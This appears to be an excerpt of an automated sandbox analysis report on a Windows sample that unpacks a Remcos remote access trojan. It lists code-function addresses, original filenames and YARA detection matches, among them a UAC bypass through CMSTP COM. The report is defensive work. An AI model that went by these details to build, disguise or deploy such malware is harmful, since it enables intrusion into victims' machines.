                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05064AA00_2_05064AA0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_100171949_2_10017194
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_1000B5C19_2_1000B5C1
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_031BDE0C10_2_031BDE0C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_0531169010_2_05311690
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_0531125810_2_05311258
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05311F0010_2_05311F00
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05313A3710_2_05313A37
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05313A4810_2_05313A48
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05311AC810_2_05311AC8
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05906C1010_2_05906C10
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_0590000710_2_05900007
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_0590004010_2_05900040
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05906C0110_2_05906C01
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D5D7010_2_077D5D70
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DCD9810_2_077DCD98
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D4AA010_2_077D4AA0
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D842810_2_077D8428
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D90D810_2_077D90D8
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D7F6810_2_077D7F68
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D5D6110_2_077D5D61
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DCD6010_2_077DCD60
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DAC1010_2_077DAC10
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DAC0A10_2_077DAC0A
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D7B3010_2_077D7B30
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D4A9110_2_077D4A91
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DA97110_2_077DA971
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DA98010_2_077DA980
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0043706A
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00414005
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0043E11C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_004541D9
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_004381E8
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041F18B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00446270
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0043E34B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_004533AB
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0042742E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00437566
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0043E5A8
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_004387F0
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0043797E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_004339D7
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0044DA49
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00427AD7
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041DBF3
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00427C40
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00437DB3
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00435EEB
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0043DEED
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_00426E9F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044B040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0043610D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00447310
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044A490
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0040755A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0043C560
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044B610
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044D6C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_004476F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044B870
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044081D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00414957
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_004079EE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00407AEB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044AA80
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00412AA9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00404B74
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00404B03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_0044BBD8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00404BE5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00404C76
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00415CFE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00416D72
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00446D30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00446D8B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00406E8F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00405038
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0041208C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_004050A9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0040511A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0043C13A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_004051AB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00449300
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0040D322
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0044A4F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0043A5AB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00413631
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00446690
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0044A730
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_004398D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_004498E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0044A886
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0043DA09
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00438D5E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00449ED0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_0041FE83
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 19_2_00430F54
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_004050C2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_004014AB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00405133
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_004051A4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00401246
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_0040CA46
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00405235
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_004032C8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00401689
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00402F60
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: String function: 00402093 appears 50 times
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: String function: 00434801 appears 41 times
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: String function: 00401E65 appears 34 times
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: String function: 00434E70 appears 54 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: String function: 004169A7 appears 87 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: String function: 0044DB70 appears 41 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: String function: 004165FF appears 35 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: String function: 00422297 appears 42 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: String function: 00444B5A appears 37 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: String function: 00413025 appears 79 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: String function: 00416760 appears 69 times
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: invalid certificate
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2087494632.000000000B4B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000000.2023056656.0000000000142000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamejfwY.exeX vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2077682525.00000000007BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4488091331.0000000001221000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Binary or memory string: OriginalFileName vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.000000000041B000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Binary or memory string: OriginalFilenamejfwY.exeX vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
